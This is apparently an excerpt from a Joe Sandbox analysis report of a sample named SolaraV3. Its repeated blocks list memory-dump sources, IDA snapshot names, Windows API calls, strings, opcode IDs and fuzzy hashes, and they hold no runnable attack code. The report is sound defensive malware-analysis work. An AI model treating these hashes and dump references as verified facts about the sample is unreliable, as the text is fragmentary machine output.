                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                              • Instruction ID: 60ba1b9f53e9d0e0ca73b16e237b5a41758d923d8acb65d232e4b7e1a499a37d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58F06221B0970A81EA209B24E4A437EA360FF497A1F541237D67E865E4DF2CE05BC340
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction ID: d7fcc1fdc0fdb477ba1f4b37f16fb16faab36ff8ad3d1c3f55781e2e7658b93e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17115432E5CA0B01FA781165E4B537D9150AF59374E0C4637FA6ED62D7DE6C69638100
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF6DC71A5A3,?,?,00000000,00007FF6DC71A83E,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71B3AF
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6DC71A5A3,?,?,00000000,00007FF6DC71A83E,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71B3CE
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6DC71A5A3,?,?,00000000,00007FF6DC71A83E,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71B3F6
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6DC71A5A3,?,?,00000000,00007FF6DC71A83E,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71B407
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6DC71A5A3,?,?,00000000,00007FF6DC71A83E,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71B418
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                              • Instruction ID: 51120308e5bf071dd94d868f5809307f97b34f3bc09d3dc409e30dfe0c420366
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90111F70F0864A81FA58972A956117D62519F447F0F58A336E93DC66D6DE2CA4638201
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                              • Instruction ID: 3f78b665e5481f3394af489ebaf854d9d232443db26f784891be9587faa9d7f3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03110960F0C60F85F9686279457217E12824F4A770F18A736E93ECA6D2DD2CB4679311
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: verbose
                                                                                                                                                                                                                              • API String ID: 3215553584-579935070
                                                                                                                                                                                                                              • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                              • Instruction ID: acca1cefd9955db0fb23f69d374c24db7b22b3884288c6a271468267b466f64d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C91D072A08A4A85F7618EACD4607BD37A5FB40BA4F44A137DA5D833D6DE3CE4279300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                              • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                              • Instruction ID: 15847c40128809faf47aee091a7e908b096008143f76c1c92c40a1cbc4d07e5f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9181D172E1C64B85F7649F2D813227C36A0AB11B88F55A037EA49D72D5CF2CE9279301
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                              • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                              • Instruction ID: 2bf336eb9efcc45af238ce5be99ebec237e132ad660c3322bdd9308f1f0f4caa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB519332A1970A8ADB14CB26E44467C73A1FB54B98F504136FA4D87784EF7EE862D700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                              • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                              • Instruction ID: 3642e66e2c657ee63a75e3045ced45d3b170a8ac51a78ca35b94e54253fc2eca
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35617232908BC985D7609B16E4403AEB7A0FB857D4F044226EBDC87B56DF7DE1A1CB00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                              • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                              • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                              • Instruction ID: 571916d6c6b2b251612df15d85af1462785746471ce510bc39ed9345e676af98
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12518E72A0834A86EB648A23904436C77B0FB55B94F14413BFA9DC7B85CF3DE462D705
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF6DC70352C,?,00000000,00007FF6DC703F1B), ref: 00007FF6DC707F32
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDirectory
                                                                                                                                                                                                                              • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                              • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                              • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                              • Instruction ID: 6159a3fe0909b507218d4bb37585b52417ebddbb817d84b32bed9a8ce47fd634
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5431E821719AC945EA218B22E4103AE6364EF84BE0F540232FE6D877C9DF3CD657CB00
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                              • API String ID: 2030045667-255084403
                                                                                                                                                                                                                              • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                              • Instruction ID: ac48b7fb5083cbf064f8585c0f2e134070770dd78a8aba58462d55460d0510f4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B21AE72B08B4586E7219B15F8957EE63A4FB88780F404136EA8D9365ADE3CE266C740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2718003287-0
                                                                                                                                                                                                                              • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                              • Instruction ID: 3e07541550a7beac845259cbbb19ef6864434d5710c9611dbbcc26be15ba6914
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99D11772B18A8589EB11CFB9D4502AC3BB1FB54798B445236DE5ED7B89DE38D027C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                              • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                              • Instruction ID: 0d8dca4ddf6bb01763834372b7d4b8cd04cdda96f7d9d93027bf4b6b5b985562
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E051F472F042198AEB24CF7C99756BC27A5AB44368F501236EE1E92AE5DF3CA5138700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2780335769-0
                                                                                                                                                                                                                              • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                              • Instruction ID: 8ca903d05b4fe6d0601630d8177329e033a12db61ff2a03246d91cecf4230eba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A51AF22E086458AFB64CF75D4603BD37B1EB48B58F14A436DE0D97689DF38D4628700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1956198572-0
                                                                                                                                                                                                                              • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                              • Instruction ID: 74362662c604f7e7c5f40a0a0847d562cf88e9f5bed9ed89757d8954ecb2912c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0111CC32F1C14A42F655976BE58427E52A1EF887C1F548032DF5987B9ACD3EE4E69300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
